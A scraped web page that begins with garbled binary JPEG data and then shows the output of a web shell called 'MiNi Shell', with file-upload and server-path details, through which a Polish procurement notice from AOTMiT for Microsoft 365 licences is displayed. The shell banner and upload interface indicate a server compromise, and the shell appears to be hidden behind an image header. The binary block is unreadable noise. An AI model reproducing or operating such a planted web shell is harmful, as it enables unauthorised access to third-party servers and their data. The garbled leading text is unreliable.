JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250602/0025847401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa oprogramowania biurowego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Agencja Oceny Technologii Medycznych i Taryfikacji</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 140278400</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Przeskok 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-032</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@aotm.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.aotmit.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa jednostka organizacyjna posiadająca osobowość prawną </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa oprogramowania biurowego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6ea8748d-1a67-4ff5-b92e-e61913e10df7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00258474</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00109099/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Pakiet oprogramowania biurowego - 300 licencji</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://aotm.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://aotm.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">ZGODNIE Z ROZDZIAŁEM XIII SWZ:<br/>2. Ofertę oraz załączniki, oświadczenia, o których mowa w art. 125 ust. 1 PZP, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .pdf, .doc, .docx, rtf,odt, xades. Ofertę, a także oświadczenie o jakim mowa w Rozdziale X SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/>3. Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują:<br/>1)	drogą elektroniczną: zp@aotm.gov.pl;<br/>2)	poprzez Platformę, dostępną pod adresem: www https://aotm.eb2b.com.pl/<br/>4. Rejestracja na Platformie, w tym złożenie oferty w formie elektronicznej, wymaga aby Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego posiadał konto na Platformie Zakupowej. Zarejestrowanie i utrzymywanie konta na Platformie Zakupowej oraz korzystanie z Platformy jest bezpłatne. Wymagania techniczne i organizacyjne korzystania z Platformy Zakupowej określa Regulamin Platformy Zakupowej (dostępny pod adresem internetowym https://aotm.eb2b.com.pl/users/terms Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego tj. bezpłatnie rejestrując się lub logując (w przypadku posiadania konta w Platformie Zakupowej), akceptuje warunki korzystania z Platformy, określone w Regulaminie oraz uznaje go za wiążący.<br/>11) Zamawiający zaleca przesyłanie plików w formacie .pdf.<br/>12) Zalecenia zamawiającego odnośnie podpisu elektronicznego:<br/>a) odnośnie kwalifikowanego podpisu elektronicznego:<br/>- dla dokumentów w formacie „pdf” zaleca się podpis w formatem PAdES,<br/>- dokumenty w formacie innym niż „pdf” zaleca się podpisywać formatem XAdES.<br/>b) odnośnie podpisu osobistego:<br/>- dla dokumentów w formacie „pdf” lub „xml” zaleca się podpis wewnętrzny (otoczony),<br/>- dokumenty w formacie innym niż „pdf” zaleca się podpisywać podpisem zewnętrznym lub otaczającym.<br/>c) odnośnie podpisu zaufanego:<br/>- wielkość dokumentów nie może przekraczać 10 MB, dostępny format podpisu „xml”.<br/><br/>Zgodnie z art. 67 ustawy p.z.p., Zamawiający podaje wymagania techniczne związane z korzystaniem z Platformy:<br/>1)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 4/1 mb/s,<br/>2)	komputer klasy PC lub lub Mac, o następującej konfiguracji: pamięć RAM min. 8 GB, procesor dwurdzeniowy o taktowaniu min. 2,4 GHz, jeden z systemów operacyjnych: MS Windows, Mac OS, Linux, z aktualnym wsparciem technicznym producenta (sugerujemy nie starsze niż 3 lata od daty wszczęcia postępowania) <br/>3)	zainstalowana dowolna wersja przeglądarki internetowej - sugerujemy najnowsze wersje: Chrome, Safari, Edge, Firefox, Opera<br/>4)	włączona obsługa JavaScript,<br/>5)	zainstalowany program obsługujący stosowane przez wykonawcę formaty plików (np. Acrobat Reader dla plików w formacie .pdf).<br/>Dokumenty i oświadczenia należy przygotować i złożyć zgodnie z ustawą PZP oraz rozporządzeniami wykonawczymi, w szczególności Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U.2020.2452 ze zm.) oraz Rozporządzeniem Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U.2020.2415 ze zm.), dalej zwane rozporządzeniem ws. Dokumentów.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa:<br/>1. 300 licencji rocznych Microsoft 365 Business Premium lub rozwiązanie równoważne uruchamiane w dniu 28 czerwca 2025 - w ramach zamówienia podstawowego,<br/>2. 50 licencji 10-year audit log retention lub rozwiązanie równoważne – w ramach prawa opcji,<br/>3. 1 licencja Exchange Online (Plan 1) lub rozwiązanie równoważne w ramach zamówienia podstawowego i 3 w ramach prawa opcji,<br/>4. 1 licencja Exchange Online (Plan 2) lub rozwiązanie równoważne w ramach zamówienia podstawowego i 3 w ramach prawa opcji,<br/>5. 1 licencja Exchange Online Archiving for Exchange Online lub rozwiązanie równoważne w ramach zamówienia podstawowego i 1 w ramach prawa opcji,<br/>6. 10 licencji Microsoft 365 Business Basic lub rozwiązanie równoważne w ramach zamówienia podstawowego i 10 w ramach prawa opcji,<br/>7. 50 licencji Microsoft 365 Copilot lub rozwiązanie równoważne – w ramach prawa opcji,<br/>8. 10 licencji Microsoft 365 E3 EEA (no Teams) lub rozwiązanie równoważne w ramach zamówienia podstawowego i 25 w ramach prawa opcji,<br/>9. 25 licencji Microsoft 365 E5 Compliance lub rozwiązanie równoważne – w ramach prawa opcji,<br/>10. 25 licencji Microsoft 365 E5 Security lub rozwiązanie równoważne – w ramach prawa opcji,<br/>11. 60 licencji Microsoft Defender for Business servers lub rozwiązanie równoważne – w ramach prawa opcji,<br/>12. 4 licencje Microsoft Defender for Cloud Apps lub rozwiązanie równoważne - w ramach zamówienia podstawowego,<br/>13. 20 licencji Microsoft Defender for Endpoint P2 lub rozwiązanie równoważne w ramach zamówienia podstawowego i 30 w ramach prawa opcji,<br/>14. 25 licencji Microsoft Entra ID Governance lub rozwiązanie równoważne – w ramach prawa opcji,<br/>15. 5 licencji Microsoft Entra ID P2 lub rozwiązanie równoważne – w ramach prawa zamówienia podstawowego,<br/>16. 25 licencji Microsoft Entra Private and Internet Access lub rozwiązanie równoważne – w ramach prawa opcji,<br/>17. 1 licencja Microsoft Intune Plan 1 Device lub rozwiązanie równoważne - w ramach zamówienia podstawowego,<br/>18. 20 licencji Microsoft Teams EEA lub rozwiązanie równoważne w ramach zamówienia podstawowego i 20 w ramach prawa opcji,<br/>19. 5 licencji Microsoft Teams Premium lub rozwiązanie równoważne w ramach zamówienia podstawowego i 25 w ramach prawa opcji,<br/>20. 5500 licencji Office 365 Extra File Storage 1 GB lub rozwiązanie równoważne w ramach zamówienia podstawowego i 2500 w ramach prawa opcji,<br/>21. 5 licencji OneDrive for Business (Plan 2) lub rozwiązanie równoważne w ramach prawa opcji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48000000-8 - Pakiety oprogramowania i systemy informatyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48317000-3 - Pakiety oprogramowania do pisania tekstów</p> <p class="mb-0">48316000-6 - Pakiety oprogramowania prezentacyjnego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Okoliczności skorzystania z Prawa Opcji: <br/>1. 50 licencji 10-year audit log retention. - Przedłużony okres przechowywania logów (m.in. dla celów rozliczalności usług AI),<br/>2. 3 licencje Exchange Online (Plan 1) - Licencje przewidziane dla kadry kierowniczej, asystentek oraz innych kluczowych osób. Możliwe uruchomienie w momencie potrzeby zwiększenia usług, możliwości konfiguracyjnych dla użytkowników skrzynek pocztowych,<br/>3. 3 licencje Exchange Online (Plan 2) - Licencje przewidziane dla głownie kadry dyrektorskiej, możliwe uruchomienie w momencie przekroczenia maksymalnego rozmiaru skrzynki pocztowej (50 GB) lub w momencie potrzeby zwiększenia usług, możliwości konfiguracyjnych dla użytkowników skrzynek pocztowych,<br/>4. 1 licencja Exchange Online Archiving for Exchange Online - Licencje przewidziane dla skrzynek służbowych, które wymagają m.in. większej przestrzeni oraz możliwości konfiguracyjnych związanych z archiwizacją skrzynek – w przypadku wyczerpania przestrzeni GB na skrzynce danego pracownika,<br/>5. 10 licencji Microsoft 365 Business Basic - Licencje zostaną uruchomione w przypadku zaangażowania kontraktorów zewnętrznych, praktykantów, itp. (w przypadku gdy nie jest potrzebne udostępnianie licencji na programy pakietu Office),<br/>6. 50 Microsoft 365 Copilot - Trwają testy inteligentnego asystenta do usług Microsoft 365 (zamawiający posiada obecnie 30 licencji); w przypadku wzrostu zainteresowania planowane jest stopniowe wyposażanie kolejnych pracowników z licencje Copilot,<br/>7. 25 licencji Microsoft 365 E3 EEA (no Teams). - W chwili obecnej Zamawiający zatrudnia 261 osób, przy maksymalnym limicie 270 etatów. Łącznie z członkami Rad oraz współpracownikami wykorzystane jest 300 licencji M 365 Business Premium oraz dodatkowe 18 licencji M 365 E3,<br/>8. 25 licencji Microsoft 365 E5 Compliance. - Dodatkowe zabezpieczenia (potrzebne w związku z planowanymi usługami m.in. AI),<br/>9. 25 licencji Microsoft 365 E5 Security. - Dodatkowe zabezpieczenia (potrzebne w związku z planowanymi usługami m.in. AI),<br/>10. 60 licencji Microsoft Defender for Business servers – Zamawiający przewiduje uruchomienie usługi Microsoft Defender na urządzeniach z systemem Windows Server oraz Linux,<br/>11. 30 licencji Microsoft Defender for Endpoint P2 - Zamawiający planuje rozszerzenie zakresu stosowania zaawansowanej wersji usługi Microsoft Defender for Endpoint do zabezpieczenia niektórych, kluczowych, komputerów (konieczne zapewnienie zabezpieczenia dla nowych licencji Business Basic oraz E3),<br/>12. 25 licencji Microsoft Entra ID Governance - Kompleksowe zarządzanie tożsamościami i dostępem, automatyzujące cykl życia tożsamości (planowane wdrożenie),<br/>13. 25 licencji Microsoft Entra Private and Internet Access - Usługi Zero Trust Network Access (ZTNA) oraz Secure Web Gateway (SWG) - planowane wdrożenie dla niektórych krytycznych użytkowników,<br/>14. 20 licencji Microsoft Teams EEA - Od 2025 r. w licencje E3 nie jest włączona licencja Teams; konieczne jest osobne wyposażenie licencji w tę licencję,<br/>15. 25 licencji Microsoft Teams Premium - W związku z przewidywaną koniecznością prowadzenia bezpiecznych spotkań z partnerami europejskimi, w dodatku w kontekście przewidywanych od stycznia 2026 r. nowych etatów, konieczne jest zaplanowanie licencji Teams Premium,<br/>16. 2500 licencji Office 365 Extra File Storage 1 GB - W związku ze spodziewanym zwiększonym zapotrzebowaniem na przestrzeń dyskową w usłudze Sharepoint Online, związaną z przechowywaniem dużych plików z danymi oraz ich historycznych wersji,<br/>17. 5 licencji OneDrive for Business (Plan 2) - Licencje rozważane w kontekście zwiększonego zapotrzebowania na przestrzeń dyskową i zaawansowane funkcje bezpieczeństwa, szczególnie dla użytkowników o podwyższonym profilu ryzyka lub potrzebach archiwizacyjnych. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Cena brutto oferty - 100% <br/><br/>a.	Ilość punktów w kryterium „Cena brutto oferty” będzie wyliczana według wzoru:<br/><br/> C min<br/>Z1 = ────────────── x 100<br/> C n<br/><br/>Z1 – liczba punktów badanej oferty w kryterium Cena brutto oferty,<br/>C min – najniższa cena brutto spośród oferowanych,<br/>C n – cena brutto badanej oferty.<br/><br/>Liczba punktów „Z1”zaokrąglana będzie do dwóch miejsc po przecinku z zastosowaniem reguł matematycznych.<br/>Maksymalna liczba punktów „Z1”, jakie może uzyskać oferta w tym kryterium to: 100 pkt.<br/>2.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>3.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>4.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający zgodnie z art. 455 ust. 1 pkt 1 ustawy Pzp przewiduje zmiany postanowień Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w poniższym rodzaju i zakresie:<br/>1)	wydłużenia terminu gwarancji, bez zwiększania kwoty, o której jest mowa w § 4 ust. 1 Umowy,<br/>2)	zmiany ceny jednostkowej poszczególnego asortymentu Zamówienia, w przypadku wprowadzenia innej stawki podatku od towarów i usług (VAT) przepisami prawa powszechnie obowiązującego, powodującej w konsekwencji zmianę kwoty, o której mowa w § 4 ust. 1 – 3 Umowy,<br/>3)	zmiany ceny jednostkowej poszczególnych elementów Zamówienia wymienionych <br/>w załączniku nr 1 lub 2 do Umowy, z uwagi na wprowadzenie nowych przepisów prawa powszechnie obowiązującego, powodujące w konsekwencji zmianę kwoty, o której mowa w § 4 ust. 1 – 3 Umowy,<br/>4)	zmiany ceny jednostkowej poszczególnych elementów Zamówienia wymienionych <br/>w załączniku nr 1 i 2 do Umowy, z uwagi na zmianę stawek opłat celnych wprowadzonych decyzjami odnośnych władz, powodującą w konsekwencji zmianę kwoty, o której mowa w § 4 ust. 1 – 3 Umowy,<br/>5)	zmiany parametrów technicznych Zamówienia, pod warunkiem, że proponowane przez Wykonawcę rozwiązania techniczne i technologiczne są równoważne lub lepsze <br/>od pierwotnie określonych w ofercie. Zmiana, o której mowa nie może prowadzić <br/>do zwiększenia wartości brutto Umowy i może zostać wprowadzona tylko w wypadku zaistnienia okoliczności, na które Wykonawca nie miał wpływu (np. wycofanie <br/>z produkcji, niedostępność na rynku w trakcie realizacji Umowy), po wcześniejszym udowodnieniu zaistniałego stanu faktycznego,<br/>6)	wyłączenia z realizacji poszczególnego elementu Zamówienia w przypadku braku możliwości dostarczenia go na warunkach określonych w pkt 5, z proporcjonalnym obniżeniem wynagrodzenia, o którym mowa w § 4 ust. 1 – 3 Umowy,<br/>7)	zmiany miejsca wykonania Zamówienia w przypadku zmiany lokalizacji siedziby Zamawiającego, bez dodatkowego wynagrodzenia dla Wykonawcy.<br/>2.	Zamawiający jest ponadto uprawniony do dokonania zmian postanowień Umowy <br/>w przypadkach określonych w art. 455 ust. 1 pkt 2-4 oraz art. 455 ust. 2 ustawy Pzp.<br/>3.	Umowa może ulec zmianie wyłącznie w drodze aneksu zawartego przez upoważnionych przedstawicieli Stron na piśmie pod rygorem nieważności. Aneks nie jest wymagany w przypadku zmian osób określonych w § 2 ust. 7 i 8 Umowy.<br/>4.	Niedopuszczalne są istotne zmiany postanowień Umowy w stosunku do treści oferty, które nie są wymienione w ust. 1. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-10 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-01</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com